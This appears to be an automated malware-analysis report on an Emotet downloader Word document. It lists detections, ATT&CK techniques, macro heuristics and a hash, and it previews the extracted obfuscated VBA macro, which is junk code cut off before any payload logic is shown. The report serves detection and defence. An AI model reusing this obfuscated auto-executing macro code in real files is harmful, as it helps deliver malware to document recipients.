Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6863643-0', indicating it functions as a downloader. The presence of VBA macros, specifically an AutoOpen macro that calls GetObject, strongly suggests it's designed to execute malicious code. This pattern is characteristic of Emotet, which often uses macro-enabled documents to deliver its payload.
Heuristics 8
- ClamAV: Doc.Downloader.Emotet-6863643-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6863643-0
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium) OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70072 bytes |

SHA-256: 1b60808f170b4570d02b602044d7acf19635d814464341de8a327c6001b9c367

Preview script: First 1,000 lines of the extracted script
Attribute VB_Name = "Z_38110"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "b04543"
Function w_71_4_()
G___902 = 463496802 - 300565441
M_67647_ = 275529203 + r7022_6
Select Case t84420
Case 393055823
j26146 = Chr(66268235 * Tan(X7124_))
Y37841 = s0_360_3
Case 728148230
O_341__ = z_46__
o97185 = S20_9_60
Case 237004443
N_7_72 = 750649577
W56770 = H908_8
End Select
j2__70 = 18518068 - 131667192
s8_9_0 = 62015676 + X7__7_96
Select Case w9__11_
Case 497061171
z_09___6 = Chr(488412061 * Tan(f6_2__5))
t4__87 = u813101
Case 672540901
w8_3__ = K__4482
k__16_57 = S90_61
Case 601956749
E052_342 = 857795623
c1__5_ = c990_9
End Select
b3453__ = 104565420 - 775740543
X_4393 = 445355691 + Y___2_65
Select Case Y5_90_
Case 79199700
r__82_ = Chr(941390874 * Tan(T_99_01_))
K769_9 = c4978_38
Case 881299136
p4318_ = t848_6_
W52_0_67 = U_74_888
Case 65364877
v99_835 = 679947712
n95286 = M_842_
End Select
v75_37 = 453532830 - 412301132
U14788_7 = 95796094 + b523053
Select Case l573_93_
Case 953038870
w3473900 = Chr(12276949 * Tan(C1_634))
H43_429 = z5_8857
Case 381220213
w198357 = R87_276
V_6982_0 = Z_5110_7
Case 543573614
U__3_186 = 630158723
l0_235 = o880_01
End Select
q02__62 = 83606640 - 488853547
d12_91 = 143256400 + A_9306
Select Case B9_51_5
Case 683430457
z8__23_ = Chr(796771875 * Tan(b677_6))
G_18481_ = a5_2_733
Case 276270113
W6___193 = k558_77
p44153 = j_58244
Case 700988235
j58707 = 144854371
W8__0_ = W369_89
End Select
s888_31 = 49539378 - 772740888
L13_1440 = 996136666 + u0630712
Select Case v56__62
Case 165732834
F_94_31_ = Chr(634065621 * Tan(k_20_20))
B0145__ = t28__0
Case 74561086
O87474 = Y44157
l7_6_35 = n1___79
Case 728333453
z2_3_32 = 249365808
E80_324 = L2339043
End Select
P44_28_ = 988772114 - 646105999
q_2_32 = 241365347 + o5754_8
Select Case B1577_9
Case 668250859
h273__ = Chr(85106757 * Tan(b90699__))
h2_889__ = S575117
Case 347078999
i39___60 = h___3209
A__1632 = d28_158
Case 562870064
l4228_87 = 706307631
S_790068 = l_4203_
End Select
End Function
Function T__6___(s__083, h562_7_4)
On Error Resume Next
l_8_1_3 = 348603701 - 398410052
s4_662__ = 765062067 + d793_60
Select Case a2_8_062
Case 559876446
G29__6_6 = Chr(142959468 * Tan(Q_4415_1))
D13_667 = u54_57__
Case 470702012
R33__25 = D48_412
S_506_61 = o375835_
Case 835402729
O2_209_8 = 692878783
V_2840 = S_57_6
End Select
P20__23_ = 922571786 - 686756153
a5775934 = 179635042 + i51__6
Select Case z_57_583
Case 927261415
H65___51 = Chr(272938300 * Tan(m8_218_))
S__913 = F_64_46
Case 649192883
N_76_77 = m_517849
m_81__7 = z457_2
Case 470863079
z2431630 = 811410163
l803188_ = a5621876
End Select
M34368 = 572154674 - 867632956
s__2_6 = 598042126 + K_2_9138
Select Case B65_9_9
Case 843314296
H6_6_09 = Chr(853046827 * Tan(I5233725))
J_273_ = I538_80_
Case 14711409
u755_4 = H92043
I564129 = b9898676
Case 338829439
s053686 = 352550132
w6_27797 = t0649309
End Select
Set c____
... (truncated)